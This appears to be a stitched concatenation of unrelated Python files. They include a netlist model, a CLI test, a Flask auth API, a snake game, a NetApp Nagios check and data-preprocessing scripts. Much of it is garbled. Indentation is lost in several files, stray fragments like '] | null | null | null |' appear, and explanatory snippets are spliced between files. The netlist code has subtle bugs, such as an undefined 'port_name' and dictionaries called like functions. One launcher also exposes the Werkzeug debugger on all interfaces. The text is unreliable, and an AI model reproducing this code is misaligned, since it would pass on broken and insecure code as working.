self.full_name = '%s.%s' % (self.parent_module.name, self.name)
for master_port in self.parent_module.ports.values():
p = pin_t(master_port, self)
self.pins[p.name] = p
def connect_pin(self, pin_name, connect_name):
# find connect
m = self.parent_module
if (connect_name in m.ports.keys()):
connect = m.ports(connect_name)
elif (connect_name in m.wires.keys()):
connect = m.wires(connect_name)
else:
print 'Error: cannot find connect (%s) in module (%s) for instance (%s)' % (connect_name, m.name, self.name)
self.pins[pin_name].ls_connect.append(connect)
connect.ls_connect.append(self)
def add_param(self, param, value):
assert param in self.parent_module.params.keys(), 'Error: param (%s) doesnot exist in module (%s)' % (param, self.parent_module.name)
self.params(param) = value
# def __eq__(self, other):
# equal = True
# if (not self.name == other.name) or (not self.parent_module.name == other.parent_module.name) or (not self.master_module.name == other.master_module.name):
# equal = False
# if not __eq_dict__(self.pins, other.pins):
# equal = False
#
# if not equal:
# print 'Error: instances (%s != %s) donot match' % (self, other)
#
# return equal
class net_t:
'basic class for wire/port/pin'
def __init__(self, name):
self.name = name
self.ls_connect = list()
class wire_t(net_t):
'wire in module, connect to internal pin'
def __init__(self, name, parent_module):
net_t.__init__(self, name)
self.parent_module = parent_module
self.ls_fanin = list()
self.ls_fanout = list()
class port_t(net_t):
'port of module, connect to internal pin'
def __init__(self, name, parent_module, direction):
net_t.__init__(self, name)
self.parent_module = parent_module
assert direction in 'input output bidirection', direction
self.direction = direction
self.full_name = '%s.%s' % (self.parent_module.name, self.name)
# def __eq__(self, other):
# if (not self.name == other.name) or (not self.parent_module.name == other.parent_module.name) or (not self.direction == other.direction):
# print 'Error: ports (%s != %s) donot match' % (self, other)
# return False
# else:
# return True
class pin_t(port_t):
'pin of instance, connect to external port/wire'
def __init__(self, master_port, parent_instance):
net_t.__init__(self, master_port.name)
self.master_port = master_port
self.parent_instance = parent_instance
self.full_name = '%s.%s.%s' % (self.parent_instance.parent_module.name, self.parent_instance.name, self.name)
# def __eq__(self, other):
# if (not self.name == other.name) or (not self.master_port.name == other.master_port.name) or (not self.parent_instance.name == other.parent_instance.name):
# print 'Error: pins (%s != %s) donot match' % (self, other)
# return False
# else:
# return true
################################################################
# compare 2 design/module
################################################################
def __eq_dict__(dict1, dict2):
if (len(set(dict1.keys()) ^ set(dict2.keys())) > 0):
return False
for key in dict1.keys():
if not (dict1[key] == dict2[port_name]):
return False
return True
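A standalone copy of the dictionary comparison that `__eq_dict__` performs (renamed `eq_dict`, with plain values in place of netlist objects) shows the two-step check — the symmetric difference of the key sets first, then per-key equality:

```python
def eq_dict(dict1, dict2):
    # symmetric difference catches keys missing from either side
    if len(set(dict1.keys()) ^ set(dict2.keys())) > 0:
        return False
    # then every shared key must map to equal values
    for key in dict1.keys():
        if not (dict1[key] == dict2[key]):
            return False
    return True

print(eq_dict({'a': 1, 'b': 2}, {'b': 2, 'a': 1}))  # True: key order does not matter
print(eq_dict({'a': 1}, {'a': 1, 'b': 2}))          # False: extra key
print(eq_dict({'a': 1}, {'a': 2}))                  # False: same key, different value
```

Checking the key sets up front avoids a `KeyError` in the value loop when one dict has keys the other lacks.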
# ---- File: tests/lib/bes/cli/test_cli.py (repo: reconstruir/bes, license: Apache-2.0) ----
#!/usr/bin/env python
#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-

from collections import namedtuple
import os.path as path

from bes.testing.program_unit_test import program_unit_test
from bes.fs.file_util import file_util
from bes.system.host import host


class test_cli(program_unit_test):

  # if host.is_unix():
  #   _program = program_unit_test.file_path(__file__, 'fake_program.py')
  # elif host.is_windows():
  #   _program = program_unit_test.file_path(__file__, 'fake_program.bat')
  # else:
  #   host.raise_unsupported_system()

  def test_cli(self):
    kitchen_program_content = '''\
#!/usr/bin/env python
from kitchen_cli import kitchen_cli

if __name__ == '__main__':
  kitchen_cli.run()
'''
    knife_cli_args_content = '''\
class knife_cli_args(object):

  def knife_add_args(self, subparser):
    p = subparser.add_parser('cut', help = 'Cut something.')
    p.add_argument('what', action = 'store', default = None, help = 'What to cut []')

  def _command_knife(self, command, *args, **kargs):
    func = getattr(self, command)
    return func(*args, **kargs)

  @classmethod
  def cut(clazz, what):
    print('cut({})'.format(what))
    return 0
'''
    oven_cli_args_content = '''\
class oven_cli_args(object):

  def oven_add_args(self, subparser):
    p = subparser.add_parser('bake', help = 'Bake something.')
    p.add_argument('what', action = 'store', default = None, help = 'What to bake []')

  def _command_oven(self, command, *args, **kargs):
    func = getattr(self, command)
    return func(*args, **kargs)

  @classmethod
  def bake(clazz, what):
    print('bake({})'.format(what))
    return 0
'''
    kitchen_cli_content = '''\
from bes.cli.cli_command import cli_command
from bes.cli.cli import cli
from knife_cli_args import knife_cli_args
from oven_cli_args import oven_cli_args

class kitchen_cli(cli):

  def __init__(self):
    super(kitchen_cli, self).__init__('kitchen')

  #@abstractmethod
  def command_list(self):
    return []

  #@abstractmethod
  def command_group_list(self):
    return [
      cli_command('knife', 'knife_add_args', 'Knife', knife_cli_args),
      cli_command('oven', 'oven_add_args', 'Oven', oven_cli_args),
    ]

  @classmethod
  def run(clazz):
    raise SystemExit(kitchen_cli().main())
'''
    tmp = self.make_temp_dir()
    kitchen_program = file_util.save(path.join(tmp, 'kitchen.py'), content = kitchen_program_content)
    file_util.save(path.join(tmp, 'knife_cli_args.py'), content = knife_cli_args_content)
    file_util.save(path.join(tmp, 'oven_cli_args.py'), content = oven_cli_args_content)
    file_util.save(path.join(tmp, 'kitchen_cli.py'), content = kitchen_cli_content)

    rv = self.run_program(kitchen_program, [ 'knife', 'cut', 'bread' ])
    self.assertEqual( 0, rv.exit_code )
    self.assertEqual( 'cut(bread)', rv.output.strip() )

    rv = self.run_program(kitchen_program, [ 'oven', 'bake', 'cheesecake' ])
    self.assertEqual( 0, rv.exit_code )
    self.assertEqual( 'bake(cheesecake)', rv.output.strip() )

if __name__ == '__main__':
  program_unit_test.main()
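The test above exercises a CLI-composition pattern: each `*_cli_args` object only knows how to register its own subcommands, and the `cli` class stitches them into one command tree. A minimal stdlib sketch of the same idea (hypothetical names, not the bes API):

```python
import argparse

# Each "args" provider registers only its own subcommands.
def knife_add_args(subparsers):
    p = subparsers.add_parser('cut', help='Cut something.')
    p.add_argument('what')

def oven_add_args(subparsers):
    p = subparsers.add_parser('bake', help='Bake something.')
    p.add_argument('what')

def build_parser(add_args_funcs):
    # Compose independent arg providers into one parser.
    parser = argparse.ArgumentParser(prog='kitchen')
    subparsers = parser.add_subparsers(dest='command')
    for add_args in add_args_funcs:
        add_args(subparsers)
    return parser

parser = build_parser([knife_add_args, oven_add_args])
args = parser.parse_args(['cut', 'bread'])
print('{}({})'.format(args.command, args.what))  # cut(bread)
```

The point of the design is that new command groups can be added without touching the existing ones.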
# src/components/auth-server/lib/presentation/restapi.py (ars1004/practica-dms-2019-2020)
from flask import Flask, escape, request, abort
from lib.data.db.schema.manager import Manager as SchemaManager
from lib.data.db.schema.recordsets.users import Users
from lib.data.db.schema.recordsets.userscores import UserScores
from lib.data.db.schema.recordsets.usersessions import UserSessions
import json


class RestApi():
    """ REST API facade.
    ---
    This class is a facade with the operations provided through the REST API.
    """

    def __init__(self):
        SchemaManager.create_schema()

    def status(self, request):
        """ Status handler.
        ---
        Always returns a tuple with the 200 status code and an "OK" message.
        """
        return (200, 'OK')

    def create_user(self, request):
        """ User creation handler.
        ---
        Performs the user creation operation, generating a new user in the database.

        Parameters:
            - request: The HTTP request received in the REST endpoint.

        Returns:
            A tuple with the following values:
                - (200, 'OK') on a successful creation.
                - (500, 'Server error') on a failed creation.
        """
        username = request.form['username']
        password = request.form['password']
        db_session = SchemaManager.session()
        users_rs = Users(db_session)
        try:
            new_user = users_rs.create(username, password)
            if (new_user is None):
                raise
        except:
            return (500, 'Server error')
        return (200, 'OK')

    def login_user(self, request):
        """ User login handler.
        ---
        Performs the user login operation, generating a new token to be used in future operations.

        Parameters:
            - request: The HTTP request received in the REST endpoint.

        Returns:
            A tuple with the following values:
                - (200, authentication token) on a successful login.
                - (401, 'Unauthorized') on a failed login.
        """
        username = request.form['username']
        password = request.form['password']
        db_session = SchemaManager.session()
        users_rs = Users(db_session)
        if (not users_rs.user_is_valid(username, password)):
            return (401, 'Unauthorized')
        user_sessions_rs = UserSessions(db_session)
        user_session = user_sessions_rs.create(username)
        return (200, user_session.token)

    def check_token(self, request):
        """ Token checking handler.
        ---
        Checks the validity of an authentication token.

        Parameters:
            - request: The HTTP request received in the REST endpoint.

        Returns:
            A tuple with the following values:
                - (200, 'OK') when the provided token is valid.
                - (401, 'Unauthorized') for an incorrect token.
        """
        token = request.form['token']
        db_session = SchemaManager.session()
        user_sessions_rs = UserSessions(db_session)
        if (not user_sessions_rs.token_is_valid(token)):
            return (401, 'Unauthorized')
        return (200, 'OK')

    def list_scores(self, request):
        """ Scores listing handler.
        ---
        Retrieves a list of scores.

        Parameters:
            - request: The HTTP request received in the REST endpoint.

        Returns:
            A tuple with the following values:
                - (200, list of score records) when the list was successfully retrieved.
        """
        db_session = SchemaManager.session()
        user_scores_rs = UserScores(db_session)
        user_score_records = user_scores_rs.get_all_user_scores()
        out = []
        for user_score_record in user_score_records:
            out.append({
                'username': user_score_record.username,
                'games_won': user_score_record.games_won,
                'games_lost': user_score_record.games_lost,
                'score': user_score_record.score
            })
        return (200, json.dumps(out))

    def add_score(self, request):
        """ Scores increasing handler.
        ---
        Increments (or decrements) the score of a user.

        Parameters:
            - request: The HTTP request received in the REST endpoint.

        Returns:
            A tuple with the following values:
                - (200, 'OK') when the score was successfully updated.
                - (401, 'Unauthorized') when the user cannot update the scores.
        """
        token = request.form['token']
        games_won_delta = int(request.form['games_won']) if 'games_won' in request.form else None
        games_lost_delta = int(request.form['games_lost']) if 'games_lost' in request.form else None
        score_delta = int(request.form['score']) if 'score' in request.form else None
        db_session = SchemaManager.session()
        user_sessions_rs = UserSessions(db_session)
        if (not user_sessions_rs.token_is_valid(token)):
            return (401, 'Unauthorized')
        user_session = user_sessions_rs.get_session(token)
        user_scores_rs = UserScores(db_session)
        user_scores_rs.add_user_score(user_session.username, games_won_delta, games_lost_delta, score_delta)
        return (200, 'OK')
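Every handler in this facade returns a plain `(status_code, message)` tuple rather than a framework response object, leaving the HTTP layer to translate it. A small sketch of such a translation step (hypothetical helper, not part of this codebase):

```python
# Hypothetical adapter: turn the (status_code, body) tuples returned by
# the RestApi facade into an HTTP status line plus body.
REASONS = {200: 'OK', 401: 'Unauthorized', 500: 'Server error'}

def to_response(result):
    code, body = result
    return '{0} {1}'.format(code, REASONS.get(code, 'Unknown')), body

status_line, body = to_response((401, 'Unauthorized'))
print(status_line)  # 401 Unauthorized
```

Keeping handlers framework-agnostic like this makes them trivially unit-testable without spinning up Flask.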
# Sprint Challenge/acme_report.py (dylan0stewart/DS-Unit-3-Sprint-1-Software-Engineering)
"""
] | null | null | null | """
Class Report: Part 4 of the Sprint Challenge
- Generate random Product list, and get an Inventory Report on that list
"""
from random import randint, sample, uniform
from acme import Product
ADJECTIVES = ['Awesome', 'Shiny', 'Impressive', 'Portable', 'Improved']
NOUNS = ['Anvil', 'Catapult', 'Disguise', 'Mousetrap', '???']
def generate_products(num_products=30):
products = []
for _ in range(num_products):
# build the name of the product
adj = sample(ADJECTIVES, 1)
noun = sample(NOUNS, 1)
name = adj[0] + ' ' + noun[0]
# establish the other variables for the product
price = randint(5, 100)
weight = randint(5, 100)
flamm = round(uniform(0, 2.5), 6)
products.append(Product(name, price, weight, flamm))
return products
def inventory_report(self):
"""
Prints out an Inventory Report for a list of Products.
"""
names = []
prices = []
weights = []
flames = []
# Loop over products list
for x in self:
names.append(x.name)
prices.append(x.price)
weights.append(x.weight)
flames.append(x.flamm)
print('ACME CORPORATION OFFICIAL INVENTORY REPORT')
print(f'There are {len(set(names))} unique products.')
print(f'Average Price: ${round(sum(prices) / len(prices),2)}.')
print(f'Average weight: {round(sum(weights) / len(weights), 2)} kgs.')
print(f'Average Flammability {round(sum(flames) / len(flames), 2)}.')
return names, prices, weights, flames
if __name__ == '__main__':
inventory_report(generate_products())
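The report's averages boil down to `round(sum(xs) / len(xs), 2)`; the same figure can be computed with the stdlib `statistics` module. A sketch only, with made-up sample prices:

```python
import statistics

# Hypothetical sample data standing in for the generated product prices.
prices = [10, 20, 35]
avg_price = round(statistics.mean(prices), 2)
print('Average Price: ${}.'.format(avg_price))  # Average Price: $21.67.
```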
# wsgi.py (nadeengamage/flaskee)
"""
Flaskee is an Open Source project for Microservices.
Developed by Nadeen Gamage | https://nadeengamage.com | nadeengamage@gmail.com
"""
from werkzeug.serving import run_simple
from werkzeug.middleware.dispatcher import DispatcherMiddleware

from flaskee import api

app = api.create_app()
application = DispatcherMiddleware(app)

if __name__ == "__main__":
    run_simple('0.0.0.0', 5000, application, use_reloader=True, use_debugger=True)
# SnakeGame/main.py (kmhmubin/Automate-the-boring-stuff-with-python3)
"""TODO: Snake Game
1. create a screen with 600x600 size
2. create a snake body
3. move the snake
4. create snake food
5. detect collision with food
6. create a scoreboard
7. detect collision with wall
8. detect collision with tail
"""
from turtle import Screen
from snake import Snake
from food import Food
from scoreboard import Scoreboard
import time

# TODO: create a screen
# create a screen object
screen = Screen()
# setup the screen
screen.setup(width=600, height=600)
# set background color to black
screen.bgcolor("black")
# add title to the screen
screen.title("Snake Game")
# turn off the turtle animation
screen.tracer(0)

# create snake object
snake = Snake()
# create food object
food = Food()
# create scoreboard object
scoreboard = Scoreboard()

# TODO: control the snake with keypresses
# start listening for keypresses
screen.listen()
# add arrow keys
screen.onkey(snake.up, "Up")
screen.onkey(snake.down, "Down")
screen.onkey(snake.left, "Left")
screen.onkey(snake.right, "Right")

game_is_on = True
while game_is_on:
    screen.update()
    time.sleep(0.1)
    # move the snake
    snake.move()

    # detect collision with food
    if snake.head.distance(food) < 15:
        food.refresh()
        snake.extend()
        scoreboard.increase_score()

    # TODO: detect collision with wall
    if snake.head.xcor() > 280 or snake.head.xcor() < -280 or snake.head.ycor() > 280 or snake.head.ycor() < -280:
        scoreboard.reset_game()
        snake.reset_snake()

    # TODO: detect collision with tail
    # if head collides with any segment in the tail then trigger game over
    for segment in snake.segments[1:]:
        if snake.head.distance(segment) < 10:
            scoreboard.reset_game()
            snake.reset_snake()

# exit on click
screen.exitonclick()
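The wall-collision test compares the head's x/y coordinates against ±280 on a 600x600 screen. Factored into a pure helper (a sketch, not part of the game code), the bounds check is easy to verify in isolation:

```python
def hit_wall(x, y, bound=280):
    # True when the snake head has left the playable area.
    return x > bound or x < -bound or y > bound or y < -bound

print(hit_wall(0, 0))    # False
print(hit_wall(281, 0))  # True
```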
# helm/dagster/schema/schema/charts/dagster/subschema/scheduler.py (asamoal/dagster)
from enum import Enum
from typing import Optional

from pydantic import Extra

from ...utils.utils import BaseModel, ConfigurableClass, create_json_schema_conditionals


class SchedulerType(str, Enum):
    DAEMON = "DagsterDaemonScheduler"
    CUSTOM = "CustomScheduler"


class SchedulerConfig(BaseModel):
    customScheduler: Optional[ConfigurableClass]

    class Config:
        extra = Extra.forbid


class Scheduler(BaseModel):
    type: SchedulerType
    config: SchedulerConfig

    class Config:
        extra = Extra.forbid
        schema_extra = {
            "allOf": create_json_schema_conditionals({SchedulerType.CUSTOM: "customScheduler"})
        }
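Because `SchedulerType` mixes `str` into the `Enum`, its members compare equal to their raw string values, which is what lets the JSON-schema conditionals key off plain strings. A stdlib-only illustration:

```python
from enum import Enum

class SchedulerType(str, Enum):
    DAEMON = "DagsterDaemonScheduler"
    CUSTOM = "CustomScheduler"

# str-mixin enum members compare equal to their values...
print(SchedulerType.CUSTOM == "CustomScheduler")  # True
# ...and can be constructed back from the raw string.
print(SchedulerType("DagsterDaemonScheduler") is SchedulerType.DAEMON)  # True
```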
# genkey/migrations/0007_auto_20190328_1149.py (MoreNiceJay/CAmanager_web)
# Generated by Django 2.0.4 on 2019-03-28 02:49
from django.db import migrations


class Migration(migrations.Migration):

    dependencies = [
        ('genkey', '0006_auto_20190327_1004'),
    ]

    operations = [
        migrations.RenameModel(
            old_name='CA',
            new_name='Company',
        ),
    ]
# data processing/create_word2vec_input.py (RayL0707/Finance_KG)
import json
import thulac
import time

# Part-of-speech tags to keep:
# n
# all+n (all excluding vm)
# a+n
# np person name
# ns place name
# ni organization name
# nz other proper noun
# t and r (time words and pronouns) are not added in this step, but must be
# considered during named entity recognition (note for later)
# i idiom
# j abbreviation
# x other
# words containing punctuation (w) are not allowed


def nowok(s):  # part-of-speech filter for the current word
    if s == 'n' or s == 'np' or s == 'ns' or s == 'ni' or s == 'nz':
        return True
    if s == 'i' or s == 'j' or s == 'x' or s == 'id' or s == 'g' or s == 't':
        return True
    if s == 't' or s == 'm':
        return True
    return False


def judge(s):  # discard words containing anything other than Chinese, English letters or digits
    num_count = 0
    for ch in s:
        if u'\u4e00' <= ch <= u'\u9fff':
            pass
        elif '0' <= ch <= '9':
            num_count += 1
        elif 'a' <= ch <= 'z':
            pass
        elif 'A' <= ch <= 'Z':
            pass
        else:
            return False
    if num_count == len(s):  # discard purely numeric words
        return False
    return True


# given the segmentation result, extract the NER candidate word list
def createWordList(x):
    i = 0
    n = len(x)
    L = []
    while i < n:
        if judge(x[i][0]) == False:
            i += 1
            continue
        if nowok(x[i][1]):
            L.append(x[i][0])
        i += 1
    return L


def createTable(num):
    start = time.time()
    thu = thulac.thulac()
    file = open('agri_economic.json', encoding='utf-8')
    print("begin!")
    f = json.load(file)
    count = 0
    file_text = ""
    for p in f:
        count += 1
        if int(count / 100) != num:
            continue
        if count % 10 == 0:
            cur = time.time()
            print("now id : " + str(count) + " table size :")
            print("Running Time : " + str(int(cur - start)) + " s......")
        detail = p['detail']
        # if len(detail) > 600:
        #     detail = detail[0:600]
        title = p['title']
        # word segmentation
        text = thu.cut(detail)
        wordList = createWordList(text)
        file_text += title
        for word in wordList:
            file_text += ' ' + word
        file_text += '\n'
    file_object = open('article' + str(num) + ".txt", 'w')
    file_object.write(file_text)
    file_object.close()


createTable(0)
#createTable(1)
#createTable(2)
#createTable(3)
#createTable(4)
#createTable(5)
#createTable(6)
#createTable(7)
#createTable(8)
#createTable(9)

#test()
#def test():
#    thu = thulac.thulac()
#    detail = "指在干旱、半干旱地区依靠自然降水栽培小麦。"
#    text = thu.cut(detail)
#    for x in text:
#        print(x[1])
#
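The `judge()` filter above relies on a Unicode code-point range comparison to recognize Chinese characters. The core check, isolated as a sketch:

```python
def is_cjk(ch):
    # CJK Unified Ideographs block, the same range judge() tests against.
    return u'\u4e00' <= ch <= u'\u9fff'

print(is_cjk(u'\u519c'))  # True  (a CJK ideograph)
print(is_cjk('a'))        # False
```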
# check_netapp.py (champain/check_netapp)
import os
import sys

from NetApp.NaServer import *
from optparse import OptionParser


# Main function to dispatch to our other functions
def main():
    if check == "vserver":
        vserver_check(vserver_name)
    elif check == "api":
        api_check()
    elif check == "cluster":
        cluster_check()
    elif check == "aggregate":
        aggr_check()
    else:
        volume_check(vol_name)


# Use this to test if the API is available
# Better than just a simple ping test
def api_check():
    get_api_status = NaElement("system-get-ontapi-version")
    api_status_out = server.invoke_elem(get_api_status)
    if (api_status_out.results_status() == "failed"):
        print ("CRITICAL - " + api_status_out.results_reason() + "\n")
        sys.exit(2)
    else:
        maj_vers = api_status_out.child_get_string("major-version")
        min_vers = api_status_out.child_get_string("minor-version")
        print "OK - API version %s.%s" % (maj_vers, min_vers)
        sys.exit(0)


# Getting more granular, check for cluster/node status
def cluster_check():
    # Query the API for cluster information
    get_cluster = NaElement("cluster-node-get-iter")
    get_cluster_out = server.invoke_elem(get_cluster)
    # Get cluster health if the API query completes and
    # add it to a dictionary with the key as cluster name
    cluster_health = {}
    if (get_cluster_out.results_status() != "passed"):
        print ("UNKNOWN - unable to retrieve cluster status"
               + "\n" + get_cluster_out.results_reason())
        sys.exit(3)
    else:
        attr_list = get_cluster_out.child_get("attributes-list")
        cluster_node_info = attr_list.children_get()
        for clust in cluster_node_info:
            node_name = clust.child_get_string("node-name")
            node_health = clust.child_get_string("is-node-healthy")
            cluster_health[node_name] = node_health
    # Start a list of good nodes and bad nodes
    bad_node = []
    good_node = []
    for node in cluster_health:
        if cluster_health[node] != "true":
            bad_node.append(node)
        else:
            good_node.append(node)
    # If we have any bad nodes we need to crit
    # otherwise all clear
    if len(bad_node) >= 1:
        print ("CRITICAL - " + ', '.join(map(str, bad_node)) +
               " not in healthy state")
        sys.exit(2)
    else:
        print ("OK - " + ', '.join(map(str, good_node)) + " healthy")
        sys.exit(0)


def vserver_check(vs_name):
    # Here let's build a request to get specific
    # vserver information
    get_vs = NaElement("vserver-get-iter")
    get_vs_query = NaElement("query")
    get_vs_info = NaElement("vserver-info")
    get_vs_info.child_add_string("vserver-name", vs_name)
    get_vs_query.child_add(get_vs_info)
    get_vs.child_add(get_vs_query)
    # Now use the above xml block to query
    # the API
    vs_out = server.invoke_elem(get_vs)
    # Handle any errors with the API, exit unknown if so
    if(vs_out.results_status() == "failed"):
        print ("UNKNOWN - " + vs_out.results_reason() + "\n")
        sys.exit(3)
    # Walk down the xml tree to get name and state
    vs_attr = vs_out.child_get("attributes-list")
    vs_info = vs_attr.children_get()
    for vs in vs_info:
        name = vs.child_get_string("vserver-name")
        state = vs.child_get_string("state")
        # Nagios exit codes depending on state
        if state == 'running':
            print "OK - vserver %s is running" % name
            sys.exit(0)
        else:
            print "CRITICAL - vserver %s is %s" % (name, state)
            sys.exit(2)


def volume_check(vol_name):
    # As usual, let's build the actual request xml
    # using volume-get-iter
    get_vol = NaElement("volume-get-iter")
    get_vol_query = NaElement("query")
    get_vol_query_attr = NaElement("volume-attributes")
    get_vol_id_attr = NaElement("volume-id-attributes")
    get_vol_id_attr.child_add_string("name", vol_name)
    get_vol_query_attr.child_add(get_vol_id_attr)
    get_vol_query.child_add(get_vol_query_attr)
    get_vol.child_add(get_vol_query)
    # Query the API
    vol_out = server.invoke_elem(get_vol)
    # Error handling again
    if(vol_out.results_status() == 'failed'):
        print ("UNKNOWN - " + vol_out.results_reason() + "\n")
        sys.exit(3)
    # Walk down the tree and get the disk usage
    vol_alist = vol_out.child_get("attributes-list")
    vol_attr = vol_alist.child_get("volume-attributes")
    vol_space_attr = vol_attr.child_get("volume-space-attributes")
    vol_id_attr = vol_attr.child_get("volume-id-attributes")
    vol_name = vol_id_attr.child_get_string("name")
    vol_vs_name = vol_id_attr.child_get_string("owning-vserver-name")
    vol_uuid = vol_id_attr.child_get_string("uuid")
    vol_used_perc = vol_space_attr.child_get_string("percentage-size-used")
    vol_long_name = vol_vs_name + ":" + vol_name
    used_perc = int(vol_used_perc)
    # Nagios handling
    if used_perc < warn_perc:
        print "OK - %s %d%% disk used." % (vol_long_name, used_perc)
        sys.exit(0)
    elif (used_perc >= warn_perc) & (used_perc < crit_perc):
        print "WARNING - %s %d%% disk used." % (vol_long_name, used_perc)
        sys.exit(1)
    elif used_perc >= crit_perc:
        print "CRITICAL - %s %d%% disk used." % (vol_long_name, used_perc)
        sys.exit(2)
    else:
        print "UNKNOWN - unable to get disk stats."
        sys.exit(3)


def aggr_check():
    # A more advanced aggregate check
    # Build the query to get information about all the aggregates
    get_aggr = NaElement("aggr-get-iter")
    get_aggr_query = NaElement("query")
    get_aggr_query_attr = NaElement("aggr-attributes")
    get_aggr_query.child_add(get_aggr_query_attr)
    get_aggr.child_add(get_aggr_query)
    # Invoke the API
    aggr_out = server.invoke_elem(get_aggr)
    # Handle an error
    if(aggr_out.results_status() == 'failed'):
        print ("UNKNOWN - " + aggr_out.results_reason() + "\n")
        sys.exit(3)
    # Need to loop through all the results
    aggr_alist = aggr_out.child_get("attributes-list")
    aggr_attrs = aggr_alist.children_get()
    aggr_checked = len(aggr_attrs)
    crit_list = []
    warn_list = []
    for aggr_attr in aggr_attrs:
        # Aggregate name
        aggr_name = aggr_attr.child_get_string('aggregate-name')
        # Raid state and status
        aggr_raid_attr = aggr_attr.child_get('aggr-raid-attributes')
        aggr_raid_state = aggr_raid_attr.child_get_string('state')
        if aggr_raid_state != 'online':
            crit_list.append(aggr_name + " raid state is " + aggr_raid_state)
        aggr_raid_status = aggr_raid_attr.child_get_string('raid-status')
        if aggr_raid_status != 'raid_dp, normal':
            warn_list.append(aggr_name + " raid status is " + aggr_raid_status)
        aggr_raid_consistency = aggr_raid_attr.child_get_string('is-inconsistent')
        if aggr_raid_consistency != 'false':
            warn_list.append(aggr_name + " raid inconsistency is " + aggr_raid_consistency)
        # Getting home node
        aggr_owner_attr = aggr_attr.child_get('aggr-ownership-attributes')
        aggr_home_name = aggr_owner_attr.child_get_string('home-name')
        aggr_owner_name = aggr_owner_attr.child_get_string('owner-name')
        if aggr_home_name != aggr_owner_name:
            warn_list.append(aggr_name + " is not home")
        # Get space information
        aggr_space_attr = aggr_attr.child_get('aggr-space-attributes')
        aggr_percent_used = aggr_space_attr.child_get_string('percent-used-capacity')
        if int(aggr_percent_used) > crit_perc:
            crit_list.append(aggr_name + " usage at " + aggr_percent_used + "%")
        elif int(aggr_percent_used) > warn_perc:
            warn_list.append(aggr_name + " usage at " + aggr_percent_used + "%")
        # Get inode information
        aggr_inode_attr = aggr_attr.child_get('aggr-inode-attributes')
        aggr_inode_percent_used = aggr_inode_attr.child_get_string('percent-inode-used-capacity')
        if int(aggr_inode_percent_used) > 74:
            crit_list.append(aggr_name + " inode usage at " + aggr_inode_percent_used + "%")
        elif int(aggr_inode_percent_used) > 70:
            warn_list.append(aggr_name + " inode usage at " + aggr_inode_percent_used + "%")
    if len(crit_list) > 0:
        crit_list_str = str(crit_list).strip('[]')
        print "CRITICAL: There are %d crits and %d warnings. (%d aggregates checked). %s" %\
            (len(crit_list), len(warn_list), aggr_checked, crit_list_str)
        sys.exit(2)
    elif len(warn_list) > 0:
        warn_list_str = str(warn_list).strip('[]')
        print "WARNING: There are %d warnings. (%d aggregates checked). %s" %\
            (len(warn_list), aggr_checked, warn_list_str)
        sys.exit(1)
    else:
        print "OK - (%d aggregates checked)" % (aggr_checked)
        sys.exit(0)


# Use OptionParser to give us nice command line args
usage = "usage: %prog [options] arg1 arg2"
parser = OptionParser()
parser.add_option("-o", "--host",
                  action="store", type="string", dest="host",
                  help="The IP or hostname of the filer")
parser.add_option("-u", "--user",
                  action="store", type="string", dest="user",
                  help="Username with API access")
parser.add_option("-p", "--password",
                  action="store", type="string", dest="password",
                  help="A password")
parser.add_option("-k", "--check",
                  action="store", type="string", dest="check",
                  help="Which check to perform, including vserver, api, cluster, volume, aggregate")
parser.add_option("-s", "--vserver-name",
                  action="store", type="string", dest="vserver_name",
                  help="Define a vserver to check")
parser.add_option("-m", "--volume-name",
                  action="store", type="string", dest="volume_name",
                  help="Define a volume to check")
parser.add_option("-c", "--critical",
                  action="store", type="string", dest="crit_perc",
                  help="Critical threshold")
parser.add_option("-w", "--warning",
                  action="store", type="string", dest="warn_perc",
                  help="Warning threshold")
(opts, args) = parser.parse_args()

if not opts.host:
    parser.error('Host not given')
else:
    host = opts.host
if not opts.user:
    parser.error('User not given')
else:
    user = opts.user
if not opts.password:
    parser.error('Password not given')
else:
    pw = opts.password
if not opts.check:
    parser.error('No check defined')
else:
    check = opts.check
if (check == "vserver") and not opts.vserver_name:
    parser.error('vserver requires a vserver name')
else:
    vserver_name = opts.vserver_name
if (check == "volume") and not opts.crit_perc:
    parser.error('You must set a critical threshold to check volume')
elif (check == "volume") and not opts.warn_perc:
    parser.error('You must set a warning threshold to check volume')
elif (check == "volume") and not opts.volume_name:
    parser.error('You must set a volume to check')
elif opts.volume_name:
    vol_name = opts.volume_name
if opts.warn_perc:
    warn_perc = int(opts.warn_perc)
if opts.crit_perc:
    crit_perc = int(opts.crit_perc)

# Instantiate our NetApp session
server = NaServer(host, 1, 21)
server.set_transport_type('HTTPS')
server.set_style('LOGIN')
server.set_admin_user(user, pw)
# Testing port for local machine
server.set_port('8080')

main()
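All of the Nagios-style checks above share the same threshold ladder: OK, WARNING, and CRITICAL map to exit codes 0, 1, and 2 respectively. Extracted as a pure function (a sketch, not part of the plugin):

```python
def classify(used_perc, warn_perc, crit_perc):
    # Map a usage percentage onto Nagios exit codes.
    if used_perc >= crit_perc:
        return 2  # CRITICAL
    if used_perc >= warn_perc:
        return 1  # WARNING
    return 0      # OK

print(classify(95, 80, 90))  # 2
print(classify(85, 80, 90))  # 1
print(classify(50, 80, 90))  # 0
```

Separating the classification from the `sys.exit` calls makes the threshold logic unit-testable without mocking the filer API.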
# regression/preprocess.py (maple7sha/dota2ml)
from pymongo import MongoClient
from progressbar import ProgressBar, Bar, Percentage, FormatLabel, ETA
import numpy as np
import os


def preprocess(percent_training_set):
    client = MongoClient()
    db = client.dotabot
    matches = db.matches

    NUM_HEROES = 114
    NUM_FEATURES = NUM_HEROES * 2
    NUM_MATCHES = matches.count()

    # X is a matrix where each row represents a match and each column is a
    # feature indicating whether a specific hero is picked(1) or not(0).
    # Y is a bit vector indicating whether radiant won(1) or lost(0).
    X = np.zeros((NUM_MATCHES, NUM_FEATURES), dtype=np.int32)
    Y = np.zeros(NUM_MATCHES, dtype=np.int32)

    widgets = [FormatLabel('Processed: %(value)d/%(max)d matches. '), ETA(), Percentage(), ' ', Bar()]
    pbar = ProgressBar(widgets=widgets, maxval=NUM_MATCHES).start()

    for i, record in enumerate(matches.find()):
        pbar.update(i)
        Y[i] = 1 if record['radiant_win'] else 0
        for player in record['players']:
            hero_id = player['hero_id'] - 1
            if player['player_slot'] >= 128:
                hero_id += NUM_HEROES
            X[i, hero_id] = 1
    pbar.finish()

    print "Generate permutation of training & testing sets."
    indices = np.random.permutation(NUM_MATCHES)
    num_train = int(NUM_MATCHES * percent_training_set)
    train_indices = indices[0 : num_train]
    test_indices = indices[num_train : NUM_MATCHES]

    X_train = X[train_indices]
